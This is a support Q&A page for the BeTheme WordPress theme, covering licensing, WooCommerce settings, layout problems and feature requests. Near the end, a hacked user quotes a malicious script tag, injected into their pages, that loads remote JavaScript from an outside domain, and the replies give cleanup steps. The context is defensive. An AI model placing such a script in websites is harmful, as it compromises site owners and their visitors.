How many times can I install and use this theme? Is possible to use on different domains?

according to Themeforest license and agreements, once purchased license can be used for one site/domain only. If you want to use this theme for few sites, then you must buy as many licenses as many sites you want to build. This applies to all themes on this marketplace and there is no other license available.

all WooCommerce related options/features that come with BeTheme, you can find under BeTheme Options > Blog, Portfolio & Shop > General and BeTheme Options > Blog, Portfolio & Shop > Shop sections. Any other features you would like to change, you have to do in WooCommerce plugin directly.

I have several videos as blog posts. When I use the Blog Slider elements and select the videos categories, the video part doesn’t show in the slider, just the title appears. It only shows if I put featured image there which I dont want as I want the video to show in slider so people can click and play without opening the single post page. This only happens to Blog Slider and not to Blog element.

yes, Blog Slider item does not display videos on slider. You have to set featured image for each post if you do not want to display the title only.

I have installed elementor ready for my next project.
On this theme showcase, it shows you have 50+ betheme elements, and I thought these would be on elementor builder.
When I start building my website with elementor, I can’t see betheme elements. I thought it would be the activation issue, but I have activated and I was still not able to see the elements.
Is there any procedure so that I can use your new elements? Or the elements are available only for muffin builder?

I’m trying to add a “SINGLE IMAGE” on my homepage. However, the image is too small and I can’t find out how to enlarge it. In the “single image settings” I set it on “full” but it’s still being resized and too small. Even when I enter the alternative pixel settings, it’s being cropped.
I also tried the Muffin builder Photo Box, but it’s the same problem.
No way to get the images larger.
I know nothing about coding and I’m not going to touch the .php files.
How can I have larger images on my homepage???? I want them at least in the size which I uploaded them in the Media Library.
I really don’t understand why you are changing/limiting these functions.

It has only the header and the footer but I can’t create these blocks with apartments?

this is Blog page and these blocks with apartments are posts. So, if this page is somehow empty, please go to Settings > Reading section and make sure Blog page is set for Posts page option.

Hello, I activated “Header Builder”, and I like what it offers. One question, however: how to add the magnifying glass and reactivate the search engine?
I manage to display the magnifying glass by retrieving the associated HTML code and pasting it in a text block, but I cannot manage to make it active and bring up the search fields.

Hi guys, I have installed the Be Raiden Design theme, and it looks great! but…. in the Ipad it looks horrible! Do you any idea, guide or something to make it nice in Ipad…. The top background is ugly and some boxes are off…. any idea?

PS: Only in some tablets like the IPad. Desktops and phone is perfect!
To be honest, we do not see anything wrong on iPad. However, we recommend to start from removing custom css as you have few lines that may affect layout on specific devices.

Why should it meet the interest of other users. I mean an option to display updated date on post is always beneficial and users can use it if they want or not use it if they don’t want. Your answer really makes no sense. With that logic, if users don’t need new demos or if the demos do not meet the interest of users, will you stop publishing new demos ?.
It does make sense as we can not add any option that anyone ask because in such case, theme would stop working on most hosting services. The more options/features we add, the more demanding hosting services are needed. So it does make sense and we can not add any option you ask for. We have to balance it not to make it too heavy.
Adding an extra post meta option will definitely not make theme heavy. This should be a single line of code and I am sure that it will not even affect the hosting. If that was the case no theme author would have done that in their theme. Anyways I understood that you don’t want to add this option at all.
We get hundreds of suggestions about new features every day so hundreds x 1 line makes definitely theme much heavier. Thus, we can not add every single feature you ask for. However, if we will get more requests about it, we will consider it of course.

Hi my side been hack, someone uploaded this code <script src=’https://lobbydesires.com/location.js?p=1' type=text/javascript></script> to all the content.
And it also in my menu section, how do i remove all of the js code?
1. Backup website and database 2. Update wordpress and plugins incase a vulnerable plugin 3. Use phpmyadmin to remove redirects within wp_options, scripts in wp_posts, wp_users. 4. If website working, then backup once again 5. Updated server as much as possible (latest PHP, incase that allows vulenerability) 6. Backup again 7. Installed security plugin, I went with sucuri plugin, re-uploaded plugins and themes to check not infected

we are very sorry to hear that your site been hacked. Usually, WP is being hacked if hacker was able to upload desired files on your FTP. In such case, we recommend to clear whole FTP and later do fresh installation of WordPress, theme and any plugin you use, should be updated to its most recent version. Unfortunately, plugin that are not up to date are the most common reason of such issues.
According to database, you should contact with your admin/hosting provider and ask him to remove any record that contains above url.
